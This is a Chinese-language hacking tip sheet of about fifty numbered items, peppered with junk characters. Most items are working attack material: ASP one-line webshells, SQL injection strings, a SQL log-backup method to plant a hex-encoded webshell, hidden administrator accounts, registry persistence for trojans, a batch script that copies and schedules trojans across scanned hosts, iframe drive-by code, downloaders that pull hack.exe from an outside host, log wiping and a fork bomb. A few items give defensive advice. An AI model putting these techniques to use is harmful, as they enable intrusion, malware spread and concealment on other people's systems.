Xp系统修改权限防止病毒或木马等破坏系统,cmd下,! C$ N7 H. q* \+ W0 @; k/ u
cacls C:\windows\system32 /G hqw20:R! n4 G% a) V4 l4 b+ d7 o
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入9 c. K! t) Z6 K0 j) _
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F/ w7 D* q$ f: q
! h" s& _! I7 ?5 B2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
$ d( ?, l0 R+ }. W! B
4 M, J" K! q w B5 W. Z4 N3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。( H, c$ d. j, @" M7 W |
# v, w$ M3 t- [ D: w
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
: R5 O4 k9 F+ I' A0 t3 ~& a, A
5、利用INF文件来修改注册表. F9 Z- n# I% m, ]$ C# O7 c' u
[Version]& R& S& s1 b$ g
Signature="$CHICAGO$"
# A3 d5 o$ o! \/ J. ?) }[Defaultinstall]
# {: q( @7 X# l( IaddREG=Ating
9 h: F( m, h- s[Ating]2 y) b" W# }; k: s4 V1 ?
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
; C3 ]8 Q( n7 a4 x! g0 O2 a+ q5 S5 Y/ y以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
( ^& a5 z9 ]/ Frundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径& c% }( l& I0 D) ]) u
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU* O5 D3 Z8 Y# ?! Q6 J; A
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU- z: ~! n0 Y$ U' V/ ~' ]' A
HKEY_CURRENT_CONFIG 简写为 HKCC
& h* a! |# Q7 b0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值" G+ [! @8 w" J4 T
"1"这里代表是写入或删除注册表键值中的具体数据
/ W5 b4 ~' r& y
3 R# S6 ]2 |: @! ^6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
# W# D% Z/ [- Y$ ` T多了一步就是在防火墙里添加个端口,然后导出其键值
* ^+ h/ I% S4 Z9 X& q[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
1 N5 h3 h! Q6 h1 V2 O" d! m
' M0 ]" [6 I: a2 C9 [7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽/ x7 \1 K# ~4 m7 j% E, z
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
6 {4 T$ j- z2 H9 D( H5 c; o- H1 A
* a5 U; t& i7 m7 V5 w8 n8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
& q4 S- l5 _: W' U. L
Q+ ^; o4 `' Z4 m# `( l6 ?" Y9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,# b, s7 ~4 V/ K
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
+ p7 M6 E- i9 L: X0 k* P# P8 {9 h5 w" F$ F* X' m7 ]
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”5 i# {2 A+ n8 G
. A! u4 w8 k" S. ]( t# p8 k11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,. p5 l9 @- X) u& \
用法:xsniff –pass –hide –log pass.txt
- S# F! @' V) d4 L
8 ~ M* q- _3 a. `* Z2 d12、google搜索的艺术
8 t' f* ]; i1 L% C搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
$ |9 [- n, i; A1 y/ k; y# T或“字符串的语法错误”可以找到很多sql注入漏洞。1 T9 \ J1 {6 P8 z
3 r, {2 o8 Q7 y1 E& n, m/ H1 X
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
3 H1 |# \. W w! S* H# N6 R& T" x% h2 u
14、cmd中输入 nc –vv –l –p 1987! a& f5 a* o% P$ ^; j
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃. p# q6 e; P( `# R. [: R7 W* a
& ?! o( M! G# t+ [3 Z8 m15、制作T++木马,先写个ating.hta文件,内容为1 v# J8 ]/ _9 Y; D/ U0 G% ?
<script language="VBScript">7 ^7 W& d6 z1 l3 n
set wshshell=createobject ("wscript.shell" )! Y m5 ^* {& V( }+ D5 _' g
a=wshshell.run("你马的名称",1)
0 C0 m" h" H" x! k$ H* zwindow.close
8 \, j$ X( |7 ?# _9 n: o+ J</script>
5 S8 W$ S" z* C0 ], m! I5 Z再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
7 e* L2 g5 m6 k: `4 \( O& ?% P: z$ t9 X1 p0 e
16、搜索栏里输入
* D! z' U, m) V# u4 `2 m关键字%'and 1=1 and '%'='3 K0 ?- ^0 @5 c. H
关键字%'and 1=2 and '%'=') [' u6 ]4 D2 G+ {
比较不同处 可以作为注入的特征字符
9 D; v0 [: \- s: U6 g' E0 k ^& f" ?0 `1 {% S' @% j* e9 S% f
17、挂马代码<html>
- y+ S- ?% c2 b; j& e<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
5 J$ a* m2 u @% }5 O7 q4 o</html>& U4 P5 q/ {3 _; k: B0 h0 L4 R/ g. N& I& b
" T' e* e @# R) Z18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
9 H# d: I" R& Vnet localgroup administrators还是可以看出Guest是管理员来。3 ], d$ b. s L+ |/ A0 S3 L2 d3 p
3 z5 E/ U* P: R19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
/ e6 F& M6 |! G用法: 安装: instsrv.exe 服务名称 路径, d: ?3 K, L4 z7 v. D9 ^
卸载: instsrv.exe 服务名称 REMOVE4 P; Z$ Y/ r( u& T( S) \
, z8 B8 C7 I- t9 m& c/ S8 K. h3 t' }/ G* |. h
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
3 z5 X8 b4 [; l% j不能注入时要第一时间想到%5c暴库。
( O# w3 z; A- G; H0 \. L7 q0 |6 a# F( [+ S: _( z# \( C
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~* U+ V1 V' J6 r9 \
. `4 p1 i7 {+ X! T' C
23、缺少xp_cmdshell时% ? B6 P6 a" B" y& q3 O! q
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'- B8 f. `. F0 F% A! h" C
假如恢复不成功,可以尝试直接加用户(针对开3389的)4 Q) j5 M( ^! V5 P* E# ?% R' b
declare @o int
2 f- v4 i C# h7 Rexec sp_oacreate 'wscript.shell',@o out
0 s$ K# j% {4 a+ }6 G9 L' texec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员7 X4 B( Y% i( k" r. X4 M
% X7 M- i' T0 b6 ?/ i2 S& a24.批量种植木马.bat5 [: t1 t! j7 @- h% Y. U
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
$ X+ o% J5 H* P# M" k* W. }9 Afor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间+ t+ `4 J3 \) _- t
扫描地址.txt里每个主机名一行 用\\开头8 h; |5 @* g: J; ^: F
+ y6 n( u. d- Y25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。% D$ |! l6 r! y# C- f9 J
, T# j2 Y2 K9 ]
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
1 \" E, Q$ m2 ^将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.7 p7 h) N+ K# t' k$ M
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
$ }' E5 d) X+ x8 p/ X2 ~, A( c
' S' ]$ T" ~, o7 g27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP2 K% P/ H# g. D, F
然后用#clear logg和#clear line vty *删除日志
6 g! p: [; p% H) ]: s, W: s M2 O3 b) H4 g/ |6 O
28、电脑坏了省去重新安装系统的方法
- G7 ^6 f. \/ K5 g纯dos下执行,. i, O, j2 f6 @& ~. ?5 Q. H
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
3 g V+ P$ J5 p% U; `" k2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config3 F _# H- V+ y6 j! o# r: t( M
6 M! y3 Y+ ]" S& @, V! [
29、解决TCP/IP筛选 在注册表里有三处,分别是:
3 M2 ]) s/ t$ A0 D" |* H1 E6 a% QHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip( [2 ~$ p7 d- r4 ?
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip( ?' U3 }, `* q3 q
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
+ d0 W% p8 q' E5 _: Y分别用
7 U0 W( l; w3 E- Y+ M! W1 @! hregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip7 y% y( a P! m3 D5 e# g
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip& b/ [/ w3 _. D5 e8 H" l
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip& N, B5 G( L& `3 ~, a7 J
命令来导出注册表项& s" n' H* V! i% V5 x. |: c
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
! l5 D8 i7 f1 }改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用; J$ I0 E+ o& l6 i1 o+ G% X
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。* x- ]' x- I* y% x6 y! H& n- C
6 ^( R) W' R j# U9 [9 E30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
6 k$ @" X, {+ X! t4 \4 Q5 jSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
: \) D! e4 q0 j4 l, f+ L$ b/ i7 c5 Q1 \3 w
31、全手工打造开3389工具
8 N. R- {& x7 }9 z打开记事本,编辑内容如下:
( ?# v8 L7 r+ x' kecho [Components] > c:\sql1 q e, ^) x9 b( {
echo TSEnable = on >> c:\sql- D8 e1 {4 j$ Z4 F+ k0 i. V3 r
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q$ f/ ]# u- n. G+ W4 I" v. ]6 W
编辑好后存为BAT文件,上传至肉鸡,执行; U9 {; J" v+ v8 p9 S! c
4 u& L: D, ^7 T1 e* B, E32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
1 O+ f$ [( q6 s" c; x, S; h- m5 l* r6 p! o. s5 X0 s* ]) k
33、让服务器重启' n% d. m$ b6 ]% |( z; l
写个bat死循环:
" M1 _) H- _$ {, [9 n8 \: p@echo off
, ]* r. v1 X0 a8 ?: b4 B' X:loop1$ F) e5 s. [. ]( k \
cls# X. D! ^* @; F" [
start cmd.exe. f! p% z( i4 Z) c" P. F1 l
goto loop1
: r+ ^8 M4 o3 O4 Z' ^) D保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
3 B( C/ [* }2 T+ [8 {/ D2 o% Q5 V, e c3 o5 ?) D
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,4 z2 o( t/ [- C) X( p
@echo off
" ?$ W* S( q& pdate /t >c:/3389.txt i+ |% e: d- p
time /t >>c:/3389.txt; E% O6 ~6 s! }6 Q8 {% B( N
attrib +s +h c:/3389.bat
% N: {9 J q$ B' v: i% |attrib +s +h c:/3389.txt/ K0 }- ?' g7 s& b
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
9 N- k! q+ r3 `! O- W并保存为3389.bat
& d: f/ |: c% a+ j& D7 r7 J8 Q打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号% O( \7 d- i8 P1 x# M
! {! N3 N. O0 a6 H
35、有时候提不了权限的话,试试这个命令,在命令行里输入:* t" G" s3 O9 E: J/ J
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
+ z; [5 K5 p" t) z9 a8 K: E6 F输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
' e! t6 C' H& w
c8 R6 l& ?" {36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
: b+ Q1 L; q; H0 c1 becho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址; U& v" ^9 D4 S0 L. C1 l
echo 你的FTP账号 >>c:\1.bat //输入账号' X, H0 L" N- r6 }3 @. w/ q
echo 你的FTP密码 >>c:\1.bat //输入密码& B# ^. ^. I+ N0 @: D3 q; W
echo bin >>c:\1.bat //登入
" l' m) L9 r5 n/ s( R" Gecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
4 p! q! Q0 A% s7 i0 s% \1 Mecho bye >>c:\1.bat //退出
/ G$ H. g: d7 @+ K# Y1 i然后执行ftp -s:c:\1.bat即可
0 A$ x0 S7 x/ ^ S8 {- L6 n2 A' n5 z$ v. ~6 a0 U
37、修改注册表开3389两法
( f+ h! Y M# l6 Y(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表1 x. \; K5 \, H5 @# j1 {
echo Windows Registry Editor Version 5.00 >>3389.reg
: h* L$ u; e' W5 C+ y! l5 {/ M2 Kecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
- a1 }0 C% l6 @5 z3 P) Y- L' aecho "Enabled"="0" >>3389.reg2 ] S. K! |6 ~- ~
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows1 B+ s* i; A2 N/ c# _5 k+ T
NT\CurrentVersion\Winlogon] >>3389.reg) g# ]) d" F) Q* q+ t- |
echo "ShutdownWithoutLogon"="0" >>3389.reg
0 O& C: @" q3 Secho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]* N7 g" g% j3 K* J
>>3389.reg
3 s+ a; `. _8 g& decho "EnableAdminTSRemote"=dword:00000001 >>3389.reg0 h2 B/ S4 C: K6 g5 n
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
% p) ^9 C$ y* \- ?' A' w>>3389.reg# E) K2 p6 Y$ W
echo "TSEnabled"=dword:00000001 >>3389.reg9 d# c7 W$ M$ g) j1 y1 E6 P
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg/ p$ ?; e f, ^0 B* [, C6 u
echo "Start"=dword:00000002 >>3389.reg' N2 M6 u/ x1 q- y& e
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]1 c$ I9 M, C3 ^ I: [
>>3389.reg
1 F p5 }$ E% ?# xecho "Start"=dword:00000002 >>3389.reg: O1 X) @3 p% A) Q5 v
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg) \/ o' n; I2 Z( U
echo "Hotkey"="1" >>3389.reg
. R2 o; r: ]' d; [7 J% J. w# q' Fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal* h: [9 q6 s' ?# `- N" ~4 x6 n
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
0 f- Q. e% ]3 D' `echo "PortNumber"=dword:00000D3D >>3389.reg, {3 g2 V3 G# ^% X
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
$ b; z& y7 N. ]$ `Server\WinStations\RDP-Tcp] >>3389.reg
- p, l1 k. n7 n) zecho "PortNumber"=dword:00000D3D >>3389.reg
9 I4 ?. n' S: w- ?- x1 d把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
' Z s( `- B* T! U, |! N7 x9 n(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)5 y4 e) s6 w: P- { ]' e
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
6 [1 {: r0 F! G& {, \& D" z( Y d(2)winxp和win2003终端开启
7 e j7 `4 R2 F+ z- ^& w用以下ECHO代码写一个REG文件:8 m. d- C% w. z, N$ K% O: x
echo Windows Registry Editor Version 5.00>>3389.reg! I$ ]& g& d9 f& ^* z' B: L) @* h$ c
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal7 Q% s( d, g( F* C2 D- @
Server]>>3389.reg4 g3 g/ _. M# u, R0 X4 e
echo "fDenyTSConnections"=dword:00000000>>3389.reg% d' n3 x" g4 e
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
: A8 H% n/ q: u' L' LServer\Wds\rdpwd\Tds\tcp]>>3389.reg
- ]$ S6 Z* h& ^ Oecho "PortNumber"=dword:00000d3d>>3389.reg9 `$ M, Z2 }1 a. ~! [
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
1 ?) C/ F% i( W. [- j- ~Server\WinStations\RDP-Tcp]>>3389.reg. j! I2 Z, v. }4 d+ d3 N" _8 }
echo "PortNumber"=dword:00000d3d>>3389.reg
. l; O/ m) E3 W; D. J然后regedit /s 3389.reg del 3389.reg
2 Z; Q/ C$ n$ [# e* UXP下不论开终端还是改终端端口都不需重启
8 e1 p+ C7 v. A5 S h1 n6 w4 X6 `. n
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃4 _7 F- |4 G' ~$ X) I
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'7 `8 Q8 b( W* k% c/ p/ E- K0 Y2 T; _
% A$ f* q# A6 ]' X
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的! X7 I7 r$ ?% c, ` V, M2 c- s
(1)数据库文件名应复杂并要有特殊字符* s- m5 @; s- Z0 c( C
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
& c" d4 R5 H% l' h" O将conn.asp文档中的+ a% P; ^5 Q+ m4 L
DBPath = Server.MapPath("数据库.mdb")
9 p# N- p+ B2 A2 r* W; qconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath1 q/ R7 y3 G* o/ q& y! E
+ ^6 H: m+ K0 X' M* O
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
8 h# s1 N2 D1 p2 _(3)不放在WEB目录里
2 M. b5 G; L# l3 o: y4 _! g4 F) N% r- ?
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
3 U! ]( V- f% M4 L; l/ p可以写两个bat文件) [: f8 c- f7 H1 r5 S6 N
@echo off, A. L! M" m: P+ ^; u( m
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe1 X& b, B1 R6 P" @7 y" }
@del c:\winnt\system32\query.exe3 P5 g2 d8 B O
@del %SYSTEMROOT%\system32\dllcache\query.exe& w' N8 `! X3 F+ L# \
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的* }/ w9 ]( P7 b/ I6 d" i9 ^
* L7 l; a; w2 e+ V@echo off4 s( c1 ]$ g7 \( y; F/ U) ]
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe, g( j j0 @* j% j: a4 ?
@del c:\winnt\system32\tsadmin.exe4 N) U% f- Q& C3 t; I% l4 k8 a0 d
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex' ~+ A& e9 h$ a- {% s) o' A/ D
* U5 q. z$ s9 K1 F; t: z s41、映射对方盘符
: p7 e" N3 z8 J: y+ Ztelnet到他的机器上,; b3 W- {! }# {" n1 B
net share 查看有没有默认共享 如果没有,那么就接着运行. m' E z/ j7 O+ ] J% l
net share c$=c:
# o0 B3 A" W: Ynet share现在有c$
% v+ R+ |+ ]! {$ U Q在自己的机器上运行8 ?" c- f" q0 I( z, b/ a
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K# @' u: [4 u m9 Q' W0 B6 I
. `' t& U$ \, \+ H/ R1 {42、一些很有用的老知识5 |+ @1 X0 ~! }" s
type c:\boot.ini ( 查看系统版本 )7 K+ B% ]8 s% C' w
net start (查看已经启动的服务)6 G7 m: \- P- r; c* I
query user ( 查看当前终端连接 )0 Z+ k3 e! [ { I, T6 N+ B+ q
net user ( 查看当前用户 )
; `2 Z7 l! A! unet user 用户 密码/add ( 建立账号 )9 R: Y$ y& E- N' K# p3 x- k) O
net localgroup administrators 用户 /add (提升某用户为管理员)
4 S; G% L) I/ C; X$ L- L" S3 bipconfig -all ( 查看IP什么的 )/ n3 K" m5 h/ K+ x) p
netstat -an ( 查看当前网络状态 ) i% a% u- n5 c) {) @ M/ _8 j8 A- ]
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)! [) B; w+ L( \% U) r7 D* o
克隆时Administrator对应1F4
! N3 @# Q* i; u9 H1 B- L% ~ m6 p% c9 Rguest对应1F5
$ B5 o3 u8 u& g( o! U( m$ `9 ~0 B: A7 Gtsinternetuser对应3E8! Q2 x- Y0 e4 }& f+ ]8 X" x( v
+ P. G4 X. H# n+ H) v2 o
43、如果对方没开3389,但是装了Remote Administrator Service; `6 t( [$ w3 j
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
/ E8 B4 S, J4 g: k解释:用serv-u漏洞导入自己配制好的radmin的注册表信息* Z6 r) e8 C- Z) `2 p% ]8 p
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"7 B; @. R4 _9 U9 Y( I" u5 B* R
& W: \# e$ m7 B
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
0 X$ [& d8 c& v4 d本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
; V9 q( G( N6 ?. Q( l' m7 t6 N( X4 S
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
( x3 V* [* A7 t; Kecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
* Z* ^9 }: T3 v8 t8 o, u Q+ G5 a0 s. M1 X^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =5 a5 O* q% n @/ R& p$ N
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
, e0 p8 c% M9 L9 Y, i$ x. `/ ^1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
( j; \4 Y# i7 p2 g, Z(这是完整的一句话,其中没有换行符) M! I" Q) t8 r, f+ t) a
然后下载:- z, `# w( f0 m
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
! x1 A1 o5 B4 A+ ]" C9 c6 E- P$ N a2 ~
46、一句话木马成功依赖于两个条件:8 F V, M+ E7 P. X0 L4 S- w
1、服务端没有禁止adodb.Stream或FSO组件
, h& p, y/ j. V3 R5 _0 z" c X2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。1 Q) Z! G& ]; l- }+ X% O9 w
% {( }+ L& F/ @47、利用DB_OWNER权限进行手工备份一句话木马的代码:5 i, d- s" g* P4 F
;alter database utsz set RECOVERY FULL--
8 l0 l* y- a$ ]( L9 L8 l i8 h; `( P;create table cmd (a image)--8 \" H& v5 J. O( o
;backup log utsz to disk = 'D:\cmd' with init--
1 L& u, l. w- c! c* w;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
, h4 c e ~" H% C8 n7 d;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
. H0 C4 P+ t4 x* t& h* H注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。 u; n! R. i, S" r3 q0 L6 }
. G R- H# w3 I0 P
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置: i: F, u, ]1 l9 G) B8 c
+ k% k2 o; b# Z
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options2 t \; ^1 P& Z1 u! w5 r2 L
所有会话用 'all'。
$ U. i" R7 {2 \$ t& ?-s sessionid 列出会话的信息。+ e- M: O/ j$ Q( u1 L
-k sessionid 终止会话。! u3 u. Q, A4 c0 v" {' g2 _$ ?
-m sessionid 发送消息到会话。# B& d$ ^; d9 R2 z
9 O) g) j. R1 m% W! n
config 配置 telnet 服务器参数。& |: j/ I# u. v+ t) R! Q0 i2 U+ S4 d
2 F7 o& P! s- \0 ?8 h
common_options 为:- {$ G9 G) e! @6 p2 h' q
-u user 指定要使用其凭据的用户
& O f Q' |$ j6 _2 w6 G-p password 用户密码
) [- B# p. b- d6 l& U& F. Z* D( J. z9 C7 ~* E4 a* m9 ?8 @( Z
config_options 为:' k6 l3 t2 u" O$ G) P
dom = domain 设定用户的默认域
# U# U1 s8 a$ d8 w. p, cctrlakeymap = yes|no 设定 ALT 键的映射
/ `7 m2 L/ j4 o- F! atimeout = hh:mm:ss 设定空闲会话超时值; u7 _0 O& K1 m' l4 i8 R* R7 q% ~ y
timeoutactive = yes|no 启用空闲会话。
& k( U r: j7 smaxfail = attempts 设定断开前失败的登录企图数。
! E4 h( _$ L) n! P( S9 s) I3 q5 Z# cmaxconn = connections 设定最大连接数。3 c( J$ a! h6 p1 z+ Y
port = number 设定 telnet 端口。
* g- I. k. u2 j3 c6 D! D, \6 nsec = [+/-]NTLM [+/-]passwd. X2 y. t7 d* P$ X1 ?
设定身份验证机构- A: K0 k! ^- d# n/ O2 t; t a
fname = file 指定审计文件名。
& P0 A* x* `0 r9 b1 |4 x) Gfsize = size 指定审计文件的最大尺寸(MB)。
) A# b( `9 M' ~' e: |+ nmode = console|stream 指定操作模式。
6 g) }- [7 _! Y) B7 k! F& Oauditlocation = eventlog|file|both8 E4 @ w4 ]( b5 z
指定记录地点
+ k% T. d* m, i6 l! ^$ Kaudit = [+/-]user [+/-]fail [+/-]admin
. [4 t- A; a, m+ Q% m4 @/ g! n# g1 D4 Q& D, I/ W
49、例如:在IE上访问:2 j: U3 [' z5 F/ k) l
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
0 g3 {6 {% Z/ Vhack.txt里面的代码是:& N) _% u" c" V; k j
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">6 a3 ~2 i8 F* g0 A3 T& z4 A& b
把这个hack.txt发到你空间就可以了!
2 e3 d- a5 _& t& G这个可以利用来做网马哦!
1 u- I( |# a+ L" X0 E; j% l5 B3 e' F/ y# }4 E
50、autorun的病毒可以通过手动限制!
8 n, K% V( T% x! h: @( X% k1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
) Y8 ^4 `3 W8 P6 y$ e* b/ ]- D; `2,打开盘符用右键打开!切忌双击盘符~
2 O$ x& L& |5 i- Z; k! Z' k" g3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
3 X4 H$ M$ y: g% b: j1 E1 N, d* T P3 H
51、log备份时的一句话木马:
+ J5 X/ W. _2 G( i$ g+ pa).<%%25Execute(request("go"))%%25>
% g5 i3 R' G+ _0 ?7 [b).<%Execute(request("go"))%>
1 W5 |8 u V x/ q; c# P% I9 Ec).%><%execute request("go")%><%; e X: \# ?; D) S; }6 b
d).<script language=VBScript runat=server>execute request("sb")</Script>
' W& q; h( E% m; R8 ge).<%25Execute(request("l"))%25>
' q( |; m( G; W5 z! O: {; g7 s* E( s6 ef).<%if request("cmd")<>"" then execute request("pass")%>/ X/ n6 }- j7 Q' i" r9 m; `
' ?; d$ [6 _% ?* _
52、at "12:17" /interactive cmd& U- I# @- s, t1 \; Z
执行后可以用AT命令查看新加的任务* Q$ c! `2 K/ {3 R+ @. K* ?
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。' Y `" G+ }( \5 [' ^
